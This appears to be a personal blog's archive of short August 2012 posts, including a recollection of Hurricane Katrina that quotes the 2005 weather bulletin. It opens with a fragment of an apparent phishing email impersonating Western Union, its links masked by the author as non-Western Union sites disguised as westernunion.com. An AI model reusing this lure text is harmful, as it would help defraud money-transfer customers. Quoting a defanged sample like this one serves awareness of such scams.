Los cargos por el servicio de transferencia y el dinero que Western Union (o sus Agencias) ganan al cambiar sus d?lares a moneda extranjera pueden variar de acuerdo a la moneda de pago que usted seleccione. Algunas localidades de agentes de Western Union pueden ofrecer al Destinatario la elecci?n de recibir el dinero en una moneda diferente a la que usted seleccion?. En tales casos, Western Union (o sus agentes) pueden ganar dinero adicional cuando cambien su dinero a la moneda elegida por el Destinatario.



WESTERN UNION PRIVACY POLICIES: Western Union may disclose your personal information to third parties as explained in its Privacy Statement ("Statement"). To obtain a copy of the Statement, ask your Western Union Agent or call 1-800-562-2598. Information disclosed may include financial background; identification, such as name and address; transaction information; and other information relating to financial matters. Recipients may include financial institutions; retailers; companies that process
transactions or provide other services for us; government agencies; and direct marketers. You may opt out of (direct us not to make) certain disclosures. If you do not opt out, we will assume that you agree that your
information may be used as the Statement describes. To opt out, call 1-800-562-2598.


We value your opinion! Go to [LINK TO NON-WESTERN UNION SITE, masked as westernunion [DOT] com] to tell us about our service. Survey code : 2879429247.


If you have any questions, visit us at [LINK TO NON-WESTERN UNION SITE, masked as westernunion [DOT] com]


Thank you for using Western Union!


DO NOT REPLY TO THIS EMAIL. IF YOU HAVE QUESTIONS PLEASE CONTACT US [LINK TO NON-WESTERN UNION SITE]

Wednesday, August 29, 2012

@christoperj:

Anybody who doesn't think we need healthcare reform has never ever gotten an obnoxiously large bill from a provider for Doctor recommended tests, only to find that this very same provider gave the insurance company an astonishing 86.5% discount on the items they agreed to reimburse -- while instead choosing to come after me for the full amount of what the insurance refused to cover.

Clearly somebody at this provider mistakenly thinks I have deeper pockets than my insurance company.

Tuesday, August 28, 2012

@securityguy23:

Rebuilding my lab box after some hardware decided to unexpectedly go all funky chicken over the weekend without the required change control approvals. . .

Seven Years Ago

On a morning not that much unlike this one, and at about this time, I woke up at a friend's apartment after we had spent the night before celebrating my birthday over a few drinks at the Dave and Buster's bar.

My inner weather nerd had been keeping up with a strong though somewhat average hurricane with an exotic sounding name that had moved into gulf in the days before. I usually do not remember storm names unless they leave an impression for whatever reason. Alicia in '83 because it made an afternoon at the YMCA day care a little more fun. Andrew in '92 because of the devastation as it crossed Florida. Kyle in '02 because it was the energizer rabbit of storms just meandering about the atlantic for about a month. And some others.

This latest storm didn't really seem all that remarkable, however. It had already smacked Florida around when it came through, if only a little when compared to others in the last year or so. But it admittedly did seem like it was going to be worse by the time it came ashore again. Hard to tell for sure as there had been so many storms in the couple of years prior, and the resulting pre-landfall hype had largely become white noise amongst the 24 hour news cycle.

Anyways, so on that morning still not that much unlike this one, I sat down at the table and went out to the internet looking for the latest storm update. Really wasn't expecting to see what had been this strong though somewhat average hurricane with the exotic sounding name had doubled in size with winds that had also jumped from only a 'meager' 115 to an 'oh crap oh crap oh crap' 175 miles an hour.

Deeply scary on paper in all the stats. Even scarier in the satellite photos.

I remember one of the signs of Andrew's strength when it pulverized Florida was how it had wound itself into nearly a tight perfect circle of storm clouds and wind. And how it's eye in the center was almost completely clear. It left a lasting visual impression of what a hurricane not to be messed with looks like.

This latest storm, looked just the same -- except it was three times larger. It had clearly become the worst case scenario and was only 36 hours offshore.

The National Hurricane Center website posted a banner on their website saying "THIS STORM WILL KILL YOU" (or something to that effect) in big bold capitalized red letters as it tried press the criciality of what was about to happen to anybody who needed to know. And they followed it up with an equally as graphic bulletin:

000
WWUS74 KLIX 281550
NPWLIX

URGENT — WEATHER MESSAGE
NATIONAL WEATHER SERVICE NEW ORLEANS LA
1011 AM CDT SUN AUG 28, 2005

...DEVASTATING DAMAGE EXPECTED...

.HURRICANE KATRINA... A MOST POWERFUL HURRICANE WITH UNPRECEDENTED STRENGTH... RIVALING THE INTENSITY OF HURRICANE CAMILLE OF 1969.

MOST OF THE AREA WILL BE UNINHABITABLE FOR WEEKS... PERHAPS LONGER. AT LEAST ONE HALF OF WELL CONSTRUCTED HOMES WILL HAVE ROOF AND WALL FAILURE. ALL GABLED ROOFS WILL FAIL... LEAVING THOSE HOMES SEVERELY DAMAGED OR DESTROYED.

THE MAJORITY OF INDUSTRIAL BUILDINGS WILL BECOME NON FUNCTIONAL. PARTIAL TO COMPLETE WALL AND ROOF FAILURE IS EXPECTED. ALL WOOD FRAMED LOW RISING APARTMENT BUILDINGS WILL BE DESTROYED. CONCRETE BLOCK LOW RISE APARTMENTS WILL SUSTAIN MAJOR DAMAGE... INCLUDING SOME WALL AND ROOF FAILURE.

HIGH RISE OFFICE AND APARTMENT BUILDINGS WILL SWAY DANGEROUSLY... A FEW TO THE POINT OF TOTAL COLLAPSE. ALL WINDOWS WILL BLOW OUT.

AIRBORNE DEBRIS WILL BE WIDESPREAD... AND MAY INCLUDE HEAVY ITEMS SUCH AS HOUSEHOLD APPLIANCES AND EVEN LIGHT VEHICLES. SPORT UTILITY VEHICLES AND LIGHT TRUCKS WILL BE MOVED. THE BLOWN DEBRIS WILL CREATE ADDITIONAL DESTRUCTION. PERSONS... PETS... AND LIVESTOCK EXPOSED TO THE WINDS WILL FACE CERTAIN DEATH IF STRUCK.

POWER OUTAGES WILL LAST FOR WEEKS... AS MOST POWER POLES WILL BE DOWN AND TRANSFORMERS DESTROYED. WATER SHORTAGES WILL MAKE HUMAN SUFFERING INCREDIBLE BY MODERN STANDARDS.

THE VAST MAJORITY OF NATIVE TREES WILL BE SNAPPED OR UPROOTED. ONLY THE HEARTIEST WILL REMAIN STANDING...BUT BE TOTALLY DEFOLIATED. FEW CROPS WILL REMAIN. LIVESTOCK LEFT EXPOSED TO THE WINDS WILL BE KILLED.

AN INLAND HURRICANE WIND WARNING IS ISSUED WHEN SUSTAINED WINDS NEAR HURRICANE FORCE... OR FREQUENT GUSTS AT OR ABOVE HURRICANE FORCE... ARE CERTAIN WITHIN THE NEXT 12 TO 24 HOURS.

ONCE TROPICAL STORM AND HURRICANE FORCE WINDS ONSET... DO NOT VENTURE OUTSIDE!

I have never read or heard such an apocalyptic alert issued in a real world situation and hope I never do again.

While Katrina made a disturbingly memorable name for herself, she thankfully lost some strength in the day or so before making it's final landfall. It could have been much much MUCH worse had the storm of this day come ashore at that moment. And when a strong hurricane Rita came ashore about a month later, everybody who cared paid attention and reacted accordingly.

Seven years later, I find myself again catering to my inner weather nerd and checking on another storm with a somewhat exotic sounding name heading towards New Orleans. I'm relieved to see this latest one seems to be mimicking it's sister only by route and schedule -- if (probably) not by strength. Although there is still time on the clock for the unforeseen to happen.

But what a weird weird irony that this is all eerily unfolding again, seven years to the day when the last one came through.

Monday, August 27, 2012

Huzzah

Since 1974. . .

Sunday, August 26, 2012

Perhaps Another Wake Up Call?

Wondering if Hurricane Issac's direct impact on the RNC convention will spark a true and civil bipartisan conversation about climate change and societal environmental responsibilities. . .

Saturday, August 25, 2012

Friday, August 24, 2012

@christoperj:

Yet another shooting by an unbalanced individual. Seriously, how many more of these does there have to be before we have a constructive non-political conversation on the best ways to prevent such stupidity?

Thursday, August 23, 2012

@christoperj:

Good golly. What is it about politics and newscycles that give such high pedestals to the handful of extreme voices on either side of an argument -- instead of the majority of those who simply want to get stuff done and move on?

Tuesday, August 14, 2012

Sunday, August 12, 2012

Bracing for Wind and Hail

Need rain, but not like this. . .

Wednesday, August 8, 2012

If Wishes were Horses

Wondering if today will be the day when it will finally rain at the Fort.

Tuesday, August 7, 2012

Thursday, August 2, 2012

Reality Check

Anybody who is surprised the founder of Chick-Fil-A has deep religious beliefs has never tried to buy nuggets and waffle fries on Sunday